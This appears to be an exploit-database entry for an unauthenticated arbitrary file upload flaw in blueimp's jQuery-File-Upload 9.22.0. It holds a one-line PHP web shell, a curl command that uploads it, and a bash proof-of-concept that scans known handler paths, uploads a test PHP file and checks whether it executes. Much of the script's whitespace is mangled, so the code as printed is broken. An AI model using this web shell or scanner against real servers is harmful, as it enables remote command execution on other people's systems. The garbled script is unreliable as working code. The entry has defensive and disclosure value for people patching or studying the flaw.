# Title: jQuery-File-Upload 9.22.0 - Arbitrary File Upload# Author: Larry W. Cashdollar, @_larry0# Date: 2018-10-09# Vendor: https://github.com/blueimp# Download Site: https://github.com/blueimp/jQuery-File-Upload/releases# CVE-ID: N/A# Vulnerability:# The code in https://github.com/blueimp/jQuery-File-Upload/blob/master/server/php/UploadHandler.php # doesn't require any validation to upload files to the server.It also doesn't exclude file types.# This allows for remote code execution.# shell.php:<?php $cmd=$_GET['cmd']; system($cmd);?># Exploit Code:
$ curl -F "files=@shell.php" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php
#!/bin/bash
USERAGENT="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
PATHS=("server/php/upload.class.php""example/upload.php""server/php/UploadHandler.php""php/index.php")
MALICIOUS_FILE="$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 12 | head -n 1).php"# What is added in this exploit from the original version# - a bit of refactoring# - automatically request the right filename if it already exists on server ex: 'file (1).php'# - Try to detect plugin version,# - Try to detect index.html (allowing files upload via gui)# Checking curl & jq
curl -h &>/dev/null
if[ $? -ne 0]; then
echo "[!] Please install curl."
echo "# apt install curl"
exit 1
fi
jq -h &>/dev/null
if[ $? -ne 0]; then
echo "[!] Please install jq."
echo "# apt install jq"
exit 1
fi
# Checking urlif[-z $1]; then
echo "[!] Please supply a target host as an argument."
echo "$0 http://www.example.com"
exit 1
fi
# Generating payload
echo "<?php echo \"it works\"; unlink(__FILE__); ?>"> ${MALICIOUS_FILE}
echo"________________________________________________________________________________"
echo"|PoC Exploit for Blueimp's jQuery File Uploader CVE-2018-9206"
echo"|Checks for older versions of the code and upload an harmless file."
echo"|"
echo"| @_larry0, @phackt_ul"
echo"|Works for version <= 9.22.0 and with Apache > 2.3.9 (AllowOverride None)."
echo"---/"
echo
echo"[+] Checking variations :"# Creating alias
curl='curl --connect-timeout 10 -sk -A "${USERAGENT}"'
index=-1
found=0# Looking for upload php class filefor x in ${PATHS[@]}; do
echo "[*] Testing... -> $1/$x"
${curl}-i "$1/$x"| head -1| grep 200&>/dev/null
if[ $? -eq 0]; then
echo "[+] Found Path: $x"
index=$((${index}+1))
found=1break;
fi;
index=$((${index}+1))
done
# Determining the exploit path according to the jquery version
exploit_path=""if[ ${index}-eq 0-o ${index}-eq 2];then
exploit_path="server/php/index.php"
fi
if[ ${index}-eq 1];then
exploit_path="example/upload.php"
fi
if[ ${index}-eq 3];then
exploit_path="php/index.php"
fi
if[ ${found}-ne 1]; then
echo "[!] ### Error: A vulnerable jQuery-File-Upload plugin was not found!"
exit 1
fi
# Trying to detect bower.json, package.json
version_files=("bower.json package.json")for x in ${version_files[@]}; do
version=`${curl}"$1/$x"| jq -r .version`
if["X"!="X""${version}"]; then
echo "[!] Found: Plugin version ${version}"break;
fi
done
# Trying to detect index.html
${curl}"$1/index.html"| grep -i "jquery file upload"&>/dev/null
if[ $? -eq 0]; then
echo "[!] Found: $1/index.html is accessible"
fi
# Uploading payload
res=""
echo "[+] Running ${curl} -F \"files[]=@${MALICIOUS_FILE}\" -F \"filename=${MALICIOUS_FILE}\" \"$1/${exploit_path}\""
filename=`${curl}-F "files[]=@${MALICIOUS_FILE}"-F "filename=${MALICIOUS_FILE}""$1/${exploit_path}"| jq -r .files[].name`
if["X""${filename}"=="X"]; then
echo "[!] It seems that we had a false positive! :("
exit 1
fi
filename=`echo "$filename"| sed 's/ /%20/g'`
# Trying to see if victim has been exploited
echo "[+] Testing path: $1/$(dirname ${exploit_path})/files/${filename}"
res=`${curl}"$1/$(dirname ${exploit_path})/files/${filename}"`
if["${res}"=="it works"]; then
echo "[!] Found: $1 is vulnerable"else
echo "[+] Seems not vulnerable :("
fi
rm -f "${MALICIOUS_FILE}"&>/dev/null
